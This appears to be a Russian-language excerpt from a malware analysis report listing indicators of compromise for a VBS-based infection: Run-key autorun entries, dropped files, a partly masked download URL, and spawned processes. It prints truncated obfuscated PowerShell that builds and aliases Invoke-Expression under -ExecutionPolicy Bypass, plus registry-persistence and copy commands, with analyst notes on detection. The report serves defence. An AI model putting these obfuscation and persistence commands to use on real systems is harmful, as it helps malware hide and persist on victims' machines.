Техническая информация
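- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%LOCALAPPDATA%\Microsoft\html.vbs' (имя параметра пустое, то есть путь записан в значение по умолчанию ключа Run; при проверке автозапуска нужно смотреть и его, а не только именованные параметры)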
- %TEMP%\aut745.tmp
- %TEMP%\setup.exe
- %TEMP%\aut765.tmp
- %LOCALAPPDATA%\html.vbs
- %LOCALAPPDATA%\microsoft\html.vbs
- %TEMP%\aut745.tmp
- %TEMP%\aut765.tmp
- http://ap###w.website/tooor.jpg
- DNS ASK google.com
- DNS ASK ap###w.website
- '%TEMP%\setup.exe'
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\html.vbs"
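- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal oE2 $c145;$ClGHPZkofkelnj=@(36,84,98,111,110,101,61,39,42,69,88,39,...' (со скрытым окном)
  Примечание: числа 111, 105, 130 разбираются как восьмеричные и дают строку «IEX», для которой `sal` создаёт псевдоним oE2 (то есть Invoke-Expression). Видимая часть десятичного массива декодируется в `$Tbone='*EX'`, остальная часть на странице обрезана. В командной строке строка «IEX» в явном виде не встречается, поэтому для обнаружения надёжнее журнал блоков сценариев PowerShell (событие 4104), чем поиск по аргументам процесса.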
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\html.vbs'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%LOCALAPPDATA%\html.vbs" "%LOCALAPPDATA%\Microsoft\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal oE2 $c145;$ClGHPZkofkelnj=@(36,84,98,111,110,101,61,39,42,69,88,39,...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\html.vbs'
- '<SYSTEM32>\cmd.exe' /c copy "%LOCALAPPDATA%\html.vbs" "%LOCALAPPDATA%\Microsoft\" /Y